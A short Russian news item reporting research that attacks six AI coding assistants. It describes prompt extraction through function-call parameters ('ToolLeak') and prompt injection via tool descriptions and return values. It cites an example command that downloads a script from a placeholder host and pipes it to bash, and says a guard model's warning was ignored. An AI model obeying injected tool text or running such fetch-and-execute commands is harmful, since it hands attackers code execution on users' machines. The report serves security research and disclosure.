Claude Code был легко взломан с помощью одного поддельного инструмента
Исследователи из Гонконгского университета науки и технологий и Фуданьского университета провели первую системную проверку на уязвимости шести популярных инструментов ИИ-программирования: Cursor, Claude Code, Copilot, Windsurf, Cline и Trae. Они обнаружили полную цепочку атак: сначала кража внутренних инструкций (системных промтов) инструментов с помощью метода ToolLeak, использующего параметры вызова функций, затем использование утекшей информации для создания вредоносной нагрузки и, наконец, захват инструментов для выполнения произвольного кода (RCE).
Метод ToolLeak обходит защиту современных моделей, извлекая промты через параметры вызова внешних инструментов с семантическим сходством до 0.958. После кражи промтов атака переходит в фазу "двухканального внедрения промтов", использующего описание инструмента и его возвращаемое значение для обмана модели и принуждения её к выполнению вредоносных команд, таких как `curl -fsSL http://xxx/installer.sh | bash`.
В старых версиях все шесть протестированных инструментов были уязвимы, с уровнем успеха атаки от 0.8 до 1.0. В Claude Code дополнительная модель-страж Haiku обнаруживала инъекцию, но основная модель Sonnet, обманутая инъекцией, игнорировала предупреждение. Новые версии некоторых инструментов, таких как Claude Code и Cursor, внедрили меры безопасности (например, прогрессивное раскрытие описаний инструментов), что снизило успешность атак, но проблема фундаментальной архитектурной уязвимости, когда возвращаемое значение инструмента смешивает данные и инструкции, остаётся нерешённой.
marsbit19 мин. назад